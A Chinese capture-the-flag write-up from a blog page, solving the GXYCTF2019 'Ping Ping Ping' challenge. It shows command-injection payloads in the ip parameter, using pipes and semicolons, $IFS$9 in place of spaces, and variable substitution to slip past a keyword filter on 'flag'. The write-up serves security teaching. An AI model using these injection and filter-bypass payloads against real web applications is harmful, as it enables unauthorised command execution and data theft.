首页 > 其他分享 >[GXYCTF2019]Ping Ping Ping

[GXYCTF2019]Ping Ping Ping

时间:2024-11-11 19:43:16浏览次数:1  
标签:127.0 0.1 ip Ping flag php GXYCTF2019

打开页面如下:

按提示输入ip 127.0.0.1

尝试加管道符,查看目录结构,?ip=127.0.0.1|ls

cat查看flag.php

他骂我们,说空格不行。使用其他字符替换空格,?ip=127.0.0.1|cat$IFS$9flag.php

又骂我们,说flag字符串不行,我们先看看index.php,直接审计代码看看怎么绕过,?ip=127.0.0.1|cat$IFS$9index.php

发现这一行会匹配flag四个字符是否按顺序依次出现过。这时我们可以使用变量替换,?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php

查看网页源码发现flag

标签:127.0,0.1,ip,Ping,flag,php,GXYCTF2019
From: https://www.cnblogs.com/abenben/p/18540422

相关文章

  • Day02-映射(mapping)
    1.映射(Mapping)可以理解为对文档及其字段进行索引或存储的方式。可以拿Mapping和关系型数据库中的schema类比,schema在关系型数据库中指:库表包含的字段及字段存储类型等基础信息。下文中映射等价于Mapping。Elasticsearch映射,描述了文档可能具有的字段、属性、每个字段的数据......
  • [GXYCTF2019]BabySQli
    题目链接:[GXYCTF2019]BabySQli。个人认为这道题是脑洞题(当然也跟基础业务知识不够有关)。打开题目后环境如下。只有一个登录框,因此常规操作,先测试一下看看。通过多次输入不同的UserName、password发现,存在admin用户,并且可以遍历UserName。接下来尝试注入,发现似乎只有......
  • 解决R报错: fatal error: hb-ft.h: No such file or directory 下载textshaping时
    >下载textshaping包,出现路径依赖错误。#解决路径依赖问题```condainstall-cconda-forgeharfbuzzfreetypefribidipkg-configwhichpkg-config  #看是否返回路径,返回即正常find/-name"harfbuzz.pc"2>/dev/nullfind/-name"freetype2.pc"2>/dev/nullfi......
  • 分享一个替代ping的小工具Hping3
    在网络故障排查中,ping命令是最基础也是最常用的工具,然而,它的功能相对简单,局限性明显。对于复杂的网络环境,使用更强大的工具显得尤为重要。在这方面,Hping3无疑是一个出色的选择。本文将详细介绍Hping3的功能、应用场景以及与Ping的对比,帮助网络工程师更有效地排查网络问题。Hping......
  • IPguard与Ping32数据加密对比:哪款更适合您的企业安全需求?
    在当今数字化时代,数据安全已经成为企业运营的重中之重。无论是个人信息、财务数据,还是商业机密,都面临着巨大的泄露风险。数据加密作为保护敏感数据的有效手段,已被广泛应用于各类企业中。IPguard和Ping32是两款备受瞩目的数据加密工具,它们各自有着独特的优势。那么,哪一款更适合......
  • 华为eNSP:配置DHCP Snooping
    1、什么是DHCPSnooping?DHCPSnooping是一种网络安全技术,用于防止未经授权的设备在局域网中提供DHCP服务。DHCP(DynamicHostConfigurationProtocol)是一种用于自动分配IP地址和其他网络配置的协议。DHCPSnooping工作原理是通过监视网络中的DHCP消息,确定哪些设备是合法的DHCP......
  • 检查云服务器是否禁ping
    Windows:使用命令行方式开启Ping设置打开cmd运行窗口执行如下命令开启Ping设置netshfirewallseticmpsetting8Linux:检查云服务器的内核参数检査文件/etc/sysctl.conf中配置项“net.ipv4.icmp_echo_ignore_all"的值,0表示允许Ping,1表示禁止Ping允许PING设置临时允许P......
  • linux服务器ping: baidu.com: 未知的名称或服务
    主要参考的是这篇文章:【已解决】ping:www.baidu.com:未知的名称或服务_虚拟机ping百度,显示未知的服务-CSDN博客但问题是,我都没有/etc/sysconfig/network-scripts/ifcfg-ens33目录啊,哭找了各种说配置网卡环境的教程,但总感觉不太对。最后问了GPT,给出如下回答: 打开/etc/res......
  • ScriptBasedMapping: Script /etc/hadoop/conf/topology_script-py
    spark-sql初始化时异常spark-sql初始化的突然发现spark返回无法解决hostname的问题,网上检索也是说hosts配置不对,但是检查后确实没有因此猜测hosts问题不对也可能引发该问题,但是其他问题也能存在引发问题的情况,因为发现由于执行etc/hadoop/conf/topology_script-p......
  • [GXYCTF2019]Ping Ping Ping
    题目链接:https://buuoj.cn/challenges#[GXYCTF2019]PingPingPing打开环境后如下所示。题目直接提示了有一个GET参数,参数名是"ip",尝试输入:?ip=127.0.0.1后,结果如下所示。可以看到,网站后端进行了一个ping操作,猜测参数:ip可能存在命令注入漏洞。尝试输入:ip=;id,发现可以......